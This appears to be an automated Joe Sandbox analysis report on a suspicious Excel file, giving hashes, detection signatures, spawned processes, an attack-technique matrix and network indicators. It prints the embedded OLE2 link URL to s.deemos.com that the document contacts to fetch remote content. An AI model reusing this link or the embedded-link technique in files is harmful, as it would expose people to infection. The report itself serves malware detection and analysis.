Windows Analysis Report
MS100384UTC.xls

Overview

General Information

Sample name:MS100384UTC.xls
Analysis ID:1578870
MD5:59b463677f083cb8bf771e27162ef915
SHA1:d97b1cdbb09e2b4b93f8de903460fade41382ff0
SHA256:c306daeb532d48d6f51f35c1612d9bed38e854aa80eb86f14513c06a6bee67d7
Tags:xls, user-abuse_ch

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Excel sheet contains many unusual embedded objects
Machine Learning detection for dropped file
Machine Learning detection for sample
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 3636 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 4928 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 1080 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\MS100384UTC.xls" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Network Connection; Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton; Data: DestinationIp: 14.103.79.10, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 3636, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49730
Source: Network Connection; Author: X__Junior (Nextron Systems); Data: DestinationIp: 192.168.2.9, DestinationIsIpv6: false, DestinationPort: 49730, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 3636, Protocol: tcp, SourceIp: 14.103.79.10, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

AV Detection

Source: MS100384UTC.xls; ReversingLabs: Detection: 18%
Source: MS100384UTC.xls; Virustotal: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\~DFA2BD46232F560DC8.TMP; Joe Sandbox ML: detected
Source: MS100384UTC.xls; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: unknown; HTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.9:49730 version: TLS 1.2
Source: global traffic; DNS query: name: s.deemos.com
Source: global traffic; TCP traffic: 192.168.2.9:49730 -> 14.103.79.10:443
Source: global traffic; TCP traffic: 192.168.2.9:49731 -> 14.103.79.10:443
Source: global traffic; TCP traffic: 14.103.79.10:443 -> 192.168.2.9:49730
Source: global traffic; TCP traffic: 14.103.79.10:443 -> 192.168.2.9:49731
Source: excel.exe; Memory has grown: Private usage: 2MB later: 91MB
Source: Joe Sandbox View; JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: global traffic; HTTP traffic detected:
    GET /qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literature HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: s.deemos.com
    Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
    GET /404 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: s.deemos.com
    Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: s.deemos.com
Source: global traffic; HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Fri, 20 Dec 2024 15:11:55 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 4645
    Connection: close
    X-DNS-Prefetch-Control: off
    X-Frame-Options: SAMEORIGIN
    Strict-Transport-Security: max-age=15724800; includeSubDomains
    X-Download-Options: noopen
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    X-Powered-By: Next.js
    ETag: "1225-4lR+8o8+z0M1Iq6OMuNgxAtPjT8"
    Vary: Accept-Encoding
Source: MS100384UTC.xls, ~DFA2BD46232F560DC8.TMP.9.dr; String found in binary or memory: https://s.deemos.com/qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literatureP
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown; Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49730 -> 443

System Summary

Source: MS100384UTC.xls; OLE: Microsoft Excel 2007+
Source: ~DFA2BD46232F560DC8.TMP.9.dr; OLE: Microsoft Excel 2007+
Source: MS100384UTC.xls; OLE indicator, VBA macros: true
Source: ~DFA2BD46232F560DC8.TMP.9.dr; OLE indicator, VBA macros: true
Source: MS100384UTC.xlsStream path 'MBD006207A8/\x1Ole' : https://s.deemos.com/qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literaturePS#c-":PH9MR379k6Oo~gj,/[v[D"vZc45~@<JMC1wQ>9uWmM2b4hxZWRSirFstcXuaZU5hVMV7khJOFHI4iqQUc3HPqz5dXGoP8tjwf9mEYyTvr3TSvTGH4fw0ZtryIvsdWjfP8NhBGzifiCIGCfVoymK6bRjW1FfJilyriMTUPbyX8lwwogJZdV5HMi3VFi9IJmoFF0rmFfDumWJuvmsEZcA30YVKkHtRoYHB1sEToIeLdoiPQXH4hN$FI5gV,Z
Source: ~DFA2BD46232F560DC8.TMP.9.drStream path 'MBD006207A8/\x1Ole' : https://s.deemos.com/qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literaturePS#c-":PH9MR379k6Oo~gj,/[v[D"vZc45~@<JMC1wQ>9uWmM2b4hxZWRSirFstcXuaZU5hVMV7khJOFHI4iqQUc3HPqz5dXGoP8tjwf9mEYyTvr3TSvTGH4fw0ZtryIvsdWjfP8NhBGzifiCIGCfVoymK6bRjW1FfJilyriMTUPbyX8lwwogJZdV5HMi3VFi9IJmoFF0rmFfDumWJuvmsEZcA30YVKkHtRoYHB1sEToIeLdoiPQXH4hN$FI5gV,Z
Source: classification engine; Classification label: mal60.winXLS@4/21@1/1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F2A1D34B.emf
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\{66B8BE34-B759-4933-B44E-F660C86A305B} - OProcSessId.dat
Source: MS100384UTC.xls; OLE indicator, Workbook stream: true
Source: ~DFA2BD46232F560DC8.TMP.9.dr; OLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; File read: C:\Users\desktop.ini
Source: unknown; Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown; Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\MS100384UTC.xls"
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: MS100384UTC.xls; Static file information: File size 1123840 > 1048576
Source: MS100384UTC.xls; Initial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: MS100384UTC.xls; Stream path 'MBD006207A6/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: MS100384UTC.xls; Stream path 'Workbook' entropy: 7.99859087916 (max. 8.0)
Source: ~DFA2BD46232F560DC8.TMP.9.dr; Stream path 'MBD006207A6/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: ~DFA2BD46232F560DC8.TMP.9.dr; Stream path 'Workbook' entropy: 7.99859087916 (max. 8.0)
Source: C:\Windows\splwow64.exe; Window / User API: threadDelayed 861
Source: C:\Windows\splwow64.exe; Last function: Thread delayed
Source: C:\Windows\splwow64.exe; Thread delayed: delay time: 120000
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Process information queried: ProcessInformation

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Exploitation for Client Execution (3); Scheduled Task/Job; At; Cron; Launchd
Persistence: Scripting (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: Process Injection (1); Extra Window Memory Injection (1); Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: Masquerading (2); Virtualization/Sandbox Evasion (1); Process Injection (1); Obfuscated Files or Information (1); Extra Window Memory Injection (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: Process Discovery (1); Virtualization/Sandbox Evasion (1); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (14); Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact

Source | Detection | Scanner | Label
MS100384UTC.xls | 18% | ReversingLabs |
MS100384UTC.xls | 13% | Virustotal |
MS100384UTC.xls | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\~DFA2BD46232F560DC8.TMP | 100% | Joe Sandbox ML |

No Antivirus matches

Name | IP | Active | Malicious | Antivirus Detection | Reputation
s.deemos.com | 14.103.79.10 | true | false | | high
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://s.deemos.com/qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literature | false | | unknown
https://s.deemos.com/404 | false | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://s.deemos.com/qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literatureP | MS100384UTC.xls, ~DFA2BD46232F560DC8.TMP.9.dr | false | | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
14.103.79.10 | s.deemos.com | China | 18002 | WORLDPHONE-INASNumberforInterdomainRoutingIN | false

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1578870
Start date and time:2024-12-20 16:09:41 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 4s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:Without Instrumentation
Number of analysed new started processes analysed:11
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:MS100384UTC.xls
Detection:MAL
Classification:mal60.winXLS@4/21@1/1
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .xls
  • Changed system and user locale, location and keyboard layout to French - France
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Active ActiveX Object
  • Active ActiveX Object
  • Active ActiveX Object
  • Active ActiveX Object
  • Active ActiveX Object
  • Scroll down
  • Close Viewer
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.109.28.47, 23.218.208.109, 52.113.194.132, 51.116.253.170, 52.149.20.212, 20.190.147.10, 13.107.246.63
  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, weu-azsc-config.officeapps.live.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, onedscolprdgwc07.germanywestcentral.cloudapp.azure.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, prod.roaming1.live.com.akadns.net, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, uks-azsc-000.roaming.officeapps.live.com, s-0005.s-msedge.net, config.officeapps.live.com, azureedge-t-prod.trafficmanager.net, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.

Time | Type | Description
10:11:55 | API Interceptor | 907x Sleep call for process: splwow64.exe modified
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):118
                Entropy (8bit):3.5700810731231707
                Encrypted:false
                SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                MD5:573220372DA4ED487441611079B623CD
                SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                Malicious:false
                Reputation:high, very likely benign file
                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):13284
                Entropy (8bit):2.735825271732709
                Encrypted:false
                SSDEEP:96:9pyRiCCyynOYeK4jlGWS0BL7g5lqUTM/tIdSUsQ5lV:9rR/W305sUTMpQR
                MD5:901DCD18F7643CAEBDE4301E05F5C748
                SHA1:A0ABDDACFFDE3CCF88AA4CBC6F7B252385745BA4
                SHA-256:BBE8A43E3E499CE8744B1C8680300A8C4EAD33C08EE82CC4D59624C0BB871FB1
                SHA-512:ADF5729E56F94556E7C979202C75FC1B051B3D9B7B30344C6E9DFE0F5164B3D30554505DC1E9BB8C6319A50436B533EAC7021CC030E040659D02C0616EE3A743
                Malicious:false
                Reputation:low
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):109544
                Entropy (8bit):4.282675970330063
                Encrypted:false
                SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
                MD5:F7B9A8F20E64B2CB6B572BCBA5866236
                SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
                SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
                SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
                Malicious:false
                Reputation:moderate, very likely benign file
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):134544
                Entropy (8bit):2.9527588414114754
                Encrypted:false
                SSDEEP:768:P0WYNNkN2HtS1u40TiTKAvGNLnvfKx4t1cEU9W3V/DOEsx:pYN/Ni0TiTKeYjfKx4tCEU9W35psx
                MD5:83F48FDD46D3424E92E24E709EAB5960
                SHA1:6CEE65663B48B56BDFF6756C38C1F4190EAC6E12
                SHA-256:77F4BCE7FBE1E2F98A04DC51994467460B255135535CDE954EEE8180F500C6AE
                SHA-512:8F781049001FC063EDB9B4352C0EA05D8DA9DCFC599234A58258C6FB4C4CED2B862A701081F10B68E286124413AD04F4AAAB485D376B0A2FB04167AFF121F47E
                Malicious:false
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):8184
                Entropy (8bit):2.5205008100361783
                Encrypted:false
                SSDEEP:96:EV5g2s88nD0btgf9W/I5i9OWZBKlA+B79YIRdMZgmR7qii1BoFV:Ea0bmlXfWZ4F79RdGgmR7qii1BY
                MD5:C3A324ED2E785A4646D1E0ECB3F54688
                SHA1:56C9FF224442995E89C407C532EFC617FBC68971
                SHA-256:56DC79F1F1C291BB4309EA270996665A4D37725C1DC7A9286EEC159830D1A4D9
                SHA-512:E62DE5C091E57C932D0B8BAB7AE06E05B8E64806D85EF4B775C837F0C63EC754C330B80A6A9E04B47B2F9C1D1434706B8F4329683ABAD7F94AF68BF05846D2D6
                Malicious:false
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):150296
                Entropy (8bit):2.816744386030506
                Encrypted:false
                SSDEEP:1536:eHNiE061ENUAI8DHW/97p8/JYbhaEUbNKGqOy:CD8qOy
                MD5:00D46C8C5AF01D6F26063D3089EBFF00
                SHA1:ABA01A9C18881FA70DDA1AE843B0374403C7C1BC
                SHA-256:4C179732F6553D0204F9F87C96432EA15953CD85EE92A0A50810C43360CC6671
                SHA-512:CF9C38E9FC1A0EC92E321E643612E6575F1EFB4D8A3D7857AFE125B90AF05D9291FEFC6EB29C29A0731E5A844CCB0368E1081DA82E2E75C343C6669532FFE078
                Malicious:false
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):1293620
                Entropy (8bit):4.563127917199792
                Encrypted:false
                SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
                MD5:F71C973B5E362DFD6408D6C009E5643E
                SHA1:24B3CE67B31BFD4791287932206D54C73489424E
                SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
                SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
                Malicious:false
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):44256
                Entropy (8bit):3.147465798679962
                Encrypted:false
                SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
                MD5:36D8FF25D14E7E2FBB1968E952FF9C17
                SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
                SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
                SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
                Malicious:false
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):44256
                Entropy (8bit):3.15066292565687
                Encrypted:false
                SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
                MD5:F1EC2E98B0F577B675156B13DCF94105
                SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
                SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
                SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
                Malicious:false
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):98872
                Entropy (8bit):2.683212156692205
                Encrypted:false
                SSDEEP:768:XOzeg0sz9sgNR/He4lzpsclOmIviIS0X9+1DW7ohBb66mQK4BTonxqQbApQKyE:+zeg0sz9sgNR/He4lzpscEmNISG9EQE
                MD5:0F51B781F5A4A57A6BADB6B2D324EA93
                SHA1:4E1B464ED1480C60760D50B6A59AEA720A603CF7
                SHA-256:0311E0368D17F93890F79333900529D4BBC64E3547EC143CB34D54BA59D68640
                SHA-512:AEEAF8FBD9AB90689122D6ED2E210F6873B6247081BDFE652EF1DBC8CEA6F8CE73D5F7DCCCAD94E3F1E899DACAEAE10B0382B96B14A713C81F7339CB0C797CA4
                Malicious:false
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):13372
                Entropy (8bit):2.648905142899473
                Encrypted:false
                SSDEEP:96:Xgk+uuzdnv7vSmd+4QXR/3sYSG3+LB3mzlNd7MxXpJPJ0HWSj0T84b4IjV:6dv/dzIRPsLGEmLd7wWj0DbN
                MD5:8E1F2CB8EA545EDEED129C53D6DD0B47
                SHA1:1D0B0BFAC585FEF8111D4AE09101F547AECA3C53
                SHA-256:92E34792CDACCDEADE34846B8A09E052AD733C91D973E0C2E5CA2020C9BED0BE
                SHA-512:39181AB0229DC768F3172103D5849B5CA9752733E66FE6F211E534E31AD2794857EF73203AE0971EBFB3E43A474D246C14E406054A93DAF38FDD41CB13779548
                Malicious:false
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):8208
                Entropy (8bit):2.5228805271736587
                Encrypted:false
                SSDEEP:96:Eeg2s88nD0btgf9Sl5i9OWZBWA+B79YIRdMZgmR7qii1BoFV:E/0bml4fWZw79RdGgmR7qii1BY
                MD5:AC82B9A9292E6679634010AFA3B51484
                SHA1:EA27CDAE6303D1931294122CEF6EB569074CD29A
                SHA-256:8158D56881DC5B0FC6D52BA05D0C9864D67A293F93179BC1DE21D24D9FA445FD
                SHA-512:FE9450B1764415487AD2C9B9B296F00F052B810E64C6C03B2514AC1BAC8167D0FC954401AF586A58294CE738C974D79ECA805DCB6E8A1944BA61B9C34EBB875E
                Malicious:false
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):13372
                Entropy (8bit):2.648905142899473
                Encrypted:false
                SSDEEP:96:Xgk+uuzdnv7vSmd+4QXR/3sYSG3+LB3mzlNd7MxXpJPJ0HWSj0T84b4IjV:6dv/dzIRPsLGEmLd7wWj0DbN
                MD5:8E1F2CB8EA545EDEED129C53D6DD0B47
                SHA1:1D0B0BFAC585FEF8111D4AE09101F547AECA3C53
                SHA-256:92E34792CDACCDEADE34846B8A09E052AD733C91D973E0C2E5CA2020C9BED0BE
                SHA-512:39181AB0229DC768F3172103D5849B5CA9752733E66FE6F211E534E31AD2794857EF73203AE0971EBFB3E43A474D246C14E406054A93DAF38FDD41CB13779548
                Malicious:false
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):13444
                Entropy (8bit):2.64547234411155
                Encrypted:false
                SSDEEP:96:tgk+uuzdnvbvSmd+4gXR/3sYSG3+LB3mzlNd7MxnpJPJ0HWSj0T84b4IjV:YdvfdzYRPsLGEmLd7wGj0DbN
                MD5:B139DA2041284D47797E9C5FA4FF7DF3
                SHA1:B87AAB70FE68479A6A9154F3A90441A5582B2E05
                SHA-256:57F09D2A10AC893D118738CDB94A49B968CB5F127F1E8156B4A33B4825CC988B
                SHA-512:900D1E52C61F15767826452A26BC467EA200A8298DD76F4A517C4FE557CE873D83B3C487777BE29B1DC270C8D958F23E2E3E3AB42EC5B3C78066A0EB8A05730A
                Malicious:false
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):8084
                Entropy (8bit):2.5551694039574895
                Encrypted:false
                SSDEEP:96:j+RiOO++Z39FAcRwxBdEtzBfCC7Boff8oBJ6ANQ4HJV:jtGNOzBArH
                MD5:721E8AAC81F0A6D4659831CB8194D668
                SHA1:6BE0CEFAEC9F0B1EAD9DE03C8D4679767CF8B549
                SHA-256:E52DF310BB20C42F738A3C8E03ED4110CB795B8A07AE5D4E474EA075564B1622
                SHA-512:24CACEED3153493E34988C35628FAA2C198C9B13AFDD8ABC214EFBA0ACCD0579BADCD5EB0F76F5BDA16D3A279DB4DF4BB218ABD5FFD751C6E62676BD1AAEF2E7
                Malicious:false
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):99352
                Entropy (8bit):2.6847207919462663
                Encrypted:false
                SSDEEP:768:hOzeQ0Mztswth/3e41zpxclOmIvi4SE3Ne1Dp7ohBb66+WKZBToE+lQbApQKdE:UzeQ0Mztswth/3e41zpxcEmN4S2Nb+wE
                MD5:FE394A9E067CDBC7197E3FEA870349AA
                SHA1:45E58779080689984B616AC559CBF6220E3D3099
                SHA-256:D9B95E8A7E05ADF0355FE1F9A53287414079F20BCD6BDDAACDE1B0C583FC3F7B
                SHA-512:7D186D1E88DB2DBC2A32EC0E56727CF815133169307D0BC909F2449C27E3872175C56669D8BD3BB8A4A6AEC06D65E427DDA5438210E7B40322826A7EE22F59D0
                Malicious:false
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):149960
                Entropy (8bit):2.8470944544374106
                Encrypted:false
                SSDEEP:1536:SHrA1061ENUAI8DHW/97p8/JYbhaEUbNNIK+A:jDhK+A
                MD5:66414D0ECB724299F9F97EE560CD8C22
                SHA1:19089FC7769879AC440E4EA67596554B3E3D4AEE
                SHA-256:07F3F2C83AD4434B1F21DA975911E9898E14C812A83A2A02757674E2EE0D4A61
                SHA-512:910492248C8515BB7B5358E38DC7F376111B5B059367BD7560739253356267A81ADABF5B585F51093990F1A23F4E0EF5CA55BEA5A4B7FFB5F28FF6C36E11F00C
                Malicious:false
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:ASCII text, with no line terminators
                Category:dropped
